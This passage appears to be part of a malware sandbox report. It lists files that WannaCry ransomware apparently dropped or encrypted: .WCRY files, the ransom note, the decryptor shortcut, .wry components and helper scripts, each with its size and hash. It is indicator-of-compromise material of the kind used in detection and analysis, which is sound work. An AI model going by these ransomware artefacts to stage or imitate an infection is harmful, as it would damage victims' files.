0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
04b46959831a021651d5be71f7b82d0d

SHA1
30798bd7d1948b3661f9f069a724be947d93fe8f

SHA256
bd7ce33007bb69d33af6194ca5537b4135ca9187f6f0a484e8dc4bea2f408be5

SHA512
4619a6cb6be8679774d7e12fcb48fa830cb93b57316d1a758316fd7d9cd0b989356c9cffb7ef71e70c4dd8c36e31f2001998f21c6627e0a794da3d2a8754b5f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
20c572a9bcaf4977fdeb91eea03a87a4

SHA1
24ab49ac3ecbe106cbe6607cf4b93dd09d580e1f

SHA256
52d63d560197d74b5f63167faf0c0d2507e856b9eb11dcb0d03a7e1c0f0b12eb

SHA512
0a1f70e6486dded78b27927c56857a17e53fb04ef34f70ce358231f2512e16ef52016832bf743251835e0c0e67173cb9a413fdea102785dcbca9ca9277d55000

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\HKBKLUUL\2\ny8zro4pDGbiNebl2UkdFP3COms.br[1].js.WCRY

Filesize
2KB

MD5
7606286ebf9b8b246cb4f6bca3d46e05

SHA1
cc15b7e375dc71cf7c274fdc3b3b513686755238

SHA256
d88d66bb097ae57271ab53dffca022e97ce644abfed2943f44824ce7c9f45902

SHA512
ce319199c46c7ec68501df8ea9b464eea7d0ea631fb055d99542710a35c52fe217075e5a3237e83758a5f95e14d51898a11d3c4cea8a1e9dd6c709853ea1e150

Download Submit
C:\Users\Admin\AppData\Local\Temp\!Please Read Me!.txt

Filesize
797B

MD5
afa18cf4aa2660392111763fb93a8c3d

SHA1
c219a3654a5f41ce535a09f2a188a464c3f5baf5

SHA256
227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0

SHA512
4161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe.lnk

Filesize
1KB

MD5
8182facfd79b884b2c027f7dbf8c5bb2

SHA1
cb09fb86975cb183e34704395fea70f6147cb6ef

SHA256
a40ae58632dc09a6b73e0cc8e539ecb2a556da7e61d283ac722fec12a1bff41b

SHA512
dcde4ef95ba46a599aa535b894a9b83007da7182c81d4f6f303270c1ff3314e3800ec40a1a0346ae1ebb6c5c4ba34995a88ad9a8efa54850a20147b2b741e14f

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.eky

Filesize
1KB

MD5
02f64b5f196d2898bdcbb94e8d580fae

SHA1
428ce6f51f47cf25fc312f23a3188408541ef02b

SHA256
890d0a4dee8eeb20567423d401ac1cbde7514be3b10288d7a30f1dbe71a1c888

SHA512
9f89374ba018dce59d0676a24a957b6ef59fa8d65d0676d97aabd4338693311df3290af71ed612bd56414bad50dc22c83f8c46142c4ee70a0e18b585093cbfcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res

Filesize
136B

MD5
f2214b90737cf5fcbbb1af5fd19a766f

SHA1
ee87f5a4f6b5b29d6d5e78807bba62dfd9eb0e55

SHA256
30f82f13b151e659a8413e7a7e7ad2718b1b7c769811def4c62095fa9eb3749a

SHA512
e2b97794031189594ed95a5798a021b5daaaf2019e04fe4a749703a8b723277823d5b8f236c2dd9280a7d15570610555781dcee7f8f591ca906dbce9b4f954a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res

Filesize
136B

MD5
ea44c7dd86e85d307ac538c69103e373

SHA1
0e9441e07d3209bd5d5309b79d97e6b1b3b0424c

SHA256
18c50c3cfd859d93b85275c5cd3f466fc4c4e27f3d247ae0ac3a3d85e1e74113

SHA512
53336f9ec5054d7a55bbd2b18b9535fedb9d442d24778cc59bf76abcf917bf1aee6e0f6b847664d22107b0939bea696a32fd57ae7ab0971ae9934f7c844e37f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res

Filesize
136B

MD5
770835d66e63ac10bf289936aa329456

SHA1
66b9acfe7f58f12ce1c068d379ee9a77421e35d2

SHA256
bce43b3b4877469aaa98970f57bf88bf25ae2db4b0183a529ee671f439b44dfe

SHA512
d24a17f2860f5d32e74ecaf948215fbb5e8bdfdfab1de2603000427882174fc8760f0661fc3518f14e8bb133d2b579cbfc3dbb686c86f35ea8660cb934fc9b83

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res

Filesize
136B

MD5
f28999f412187ebf52f851bd34557dc8

SHA1
3e38e3f639db5e764a64136094539be6d3a206b7

SHA256
0b027b3fa506d61b7312688305b0954631f3dc98037cfd19575edb8f7fdd65ed

SHA512
7dfebb45fd4ddcb6b3f3c15dcedd4c1a78d0b70dddba31d571d9b664791c286d9b3d1540f6253c8a8cf4425792ca237320d97d0e8c77e60db6ea5cdd6c28d482

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res

Filesize
136B

MD5
ee4aba225058d16fcc1bdf06a0de9eb2

SHA1
2e1f05ce6efbd43e6007a75fec34f7caf5d680fc

SHA256
78ec115224dfe9551fb7954cff96266ad30a75bf7af17a87eb4f267a53cda39e

SHA512
fe58ce7144d074981a8c808032c7a36cfd02366a8ef849ad0dce662bad4c40047773d4ab8d1ad9f61c08daf306985b21fcaef37f38f718a7ff421cbcd945c147

Download Submit
C:\Users\Admin\AppData\Local\Temp\312351718094787.bat

Filesize
336B

MD5
3540e056349c6972905dc9706cd49418

SHA1
492c20442d34d45a6d6790c720349b11ec591cde

SHA256
73872a89440a2cba9d22bf4961c3d499ea2c72979c30c455f942374292fedadc

SHA512
c949d147100aef59e382c03abf7b162ae62a4d43456eebd730fbedcf5f95f5e1a24f6e349690d52d75331878a6ee8f6b88a7162ee9cf2a49e142196b12d0133c

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.vbs

Filesize
219B

MD5
5f6d40ca3c34b470113ed04d06a88ff4

SHA1
50629e7211ae43e32060686d6be17ebd492fd7aa

SHA256
0fb5039a2fe7e90cdf3f22140d7f2103f94689b15609efe0edcc8430dd772fc1

SHA512
4d4aa1abd2c9183202fd3f0a65b37f07ee0166ba6561f094c13c8ea59752c7bdd960e37c49583746d4464bc3b1dc0b63a1fe36a37ce7e5709cd76ed433befe35

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.wry

Filesize
628B

MD5
40afb36afbe2bdc492847c8b91302b66

SHA1
53dac49a48d28e079e70bc6ee4b62cc34a3ffe97

SHA256
100f9c6f3b275f2f804234d9a2cce4d4f8b0a33fb36dbbf2516d0cc76d28a377

SHA512
cf1826b6ed6256ab07f1d41ef9b8410f044eae0941fa1f516c386ddfae95dc49d3cf674e1055beda6827bdb629edb21b71c9176817b0413fba97cd25ad3309ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\f.wry

Filesize
332B

MD5
2c03d43389ed4cdafc05c5911343ae52

SHA1
63bc3b76ed17388fc4a9ea2c8c6ef141bd239403

SHA256
5499624aa36ea816f5a9c095c383f201f6a454b26036d66547633537bc97ece2

SHA512
6d56e39d3696589ffa35570b906050ce177899ad0e926cba6b8b45174d2436f06f6307e5d35af931a9618ac5db492f6686e73520d2c6cb2f40aa96bd3d930bbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\m.wry

Filesize
42KB

MD5
980b08bac152aff3f9b0136b616affa5

SHA1
2a9c9601ea038f790cc29379c79407356a3d25a3

SHA256
402046ada270528c9ac38bbfa0152836fe30fb8e12192354e53b8397421430d9

SHA512
100cda1f795781042b012498afd783fd6ff03b0068dbd07b2c2e163cd95e6c6e00755ce16b02b017693c9febc149ed02df9df9b607e2b9cca4b07e5bd420f496

Download Submit
C:\Users\Admin\AppData\Local\Temp\u.wry

Filesize
236KB

MD5
cf1416074cd7791ab80a18f9e7e219d9

SHA1
276d2ec82c518d887a8a3608e51c56fa28716ded

SHA256
78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

SHA512
0bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5

Download Submit
C:\Users\Admin\Desktop\AssertMove.ppsm.WCRY

Filesize
407KB

MD5
201590394baaea1e53f0f76d5ea36384

SHA1
d2698267703918aec09a5b231ba418715aeb554b

SHA256
f31e632cf7ab9f4578136f4a0f571e32aa83c1d65a31c4e168bea27ce748ca62

SHA512
5e618f6ea8ad3d4b8c477b65671b30519049d860e2b97e904602c37b8c75918bda1b824f829b8e45fff9ec388a064e75b39a3b726fc4982763113c2a2b5670d6

Download Submit
C:\Users\Admin\Documents\LockEdit.docm.WCRY

Filesize
662KB

MD5
10a608d8c56c23aa7af4765a0742da70

SHA1
463c9fa8c468a815ba79f8a42ff519565ed51518

SHA256
15ff2fcace87ecfb524a77fb5b846e1a1ed050b52d426aa7de6ce82724e2d99b

SHA512
e109b964597b67653438e16a2176f53a1f41223e195fa10717a9849669fab8f1f30d3bdec2ffe93ea05068fee848273da535b67fcf1b28e46d03d1f1457e1838

Download Submit
C:\Users\Admin\Music\CompressSync.ods.WCRY

Filesize
237KB

MD5
e8d4eb9a7998876cf18169600c8e6110

SHA1
bae6d1b8042c6b1428eba9b6a46275a3bc116a03

SHA256
3459e6831f549dff4fc9ed31aacb47e6e37b99830f3560fa08931fde3078e1fb

SHA512
6607a9c0518bb296dbaa7ebf2b2c885e0a05146db7f6e937c92288fa701b3ca1559518303f2af107ab12738cf8489d8e1260dce61a414bbd3502386db573efee

Download Submit
C:\Users\All Users\Microsoft\Diagnosis\osver.txt.WCRY

Filesize
296B

MD5
1c489dd69d84b8f9d0a735ecc4976e26

SHA1
097daf6c23cc2c50889d53351ac399b53bfd540a

SHA256
aa91c55ab21b3fa000e04531fe86138bf757d24166ef074524e3f25cfd80d1ce

SHA512
ce8692ecd8c604ee280d58a59a2c307eb88ed9fd50e24e100ce2882c38c0a2983a375d183ba59c7acd8ec8e1698d83978f2d7ecfa8469d81f8f3ee2e483bf96a

Download Submit
\??\pipe\LOCAL\crashpad_3952_BYQNUSRYPCQXZEPX

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1728-6-0x0000000010000000-0x0000000010012000-memory.dmp

Filesize
72KB

Download
memory/4672-1785-0x000001F23EA40000-0x000001F23EA50000-memory.dmp

Filesize
64KB

Download
memory/4672-1801-0x000001F23EB40000-0x000001F23EB50000-memory.dmp

Filesize
64KB

Download
memory/4672-1817-0x000001F246E40000-0x000001F246E41000-memory.dmp

Filesize
4KB

Download
memory/4672-1819-0x000001F246E70000-0x000001F246E71000-memory.dmp

Filesize
4KB

Download
memory/4672-1821-0x000001F246F80000-0x000001F246F81000-memory.dmp

Filesize
4KB

Download
memory/4672-1820-0x000001F246E70000-0x000001F246E71000-memory.dmp

Filesize
4KB

Download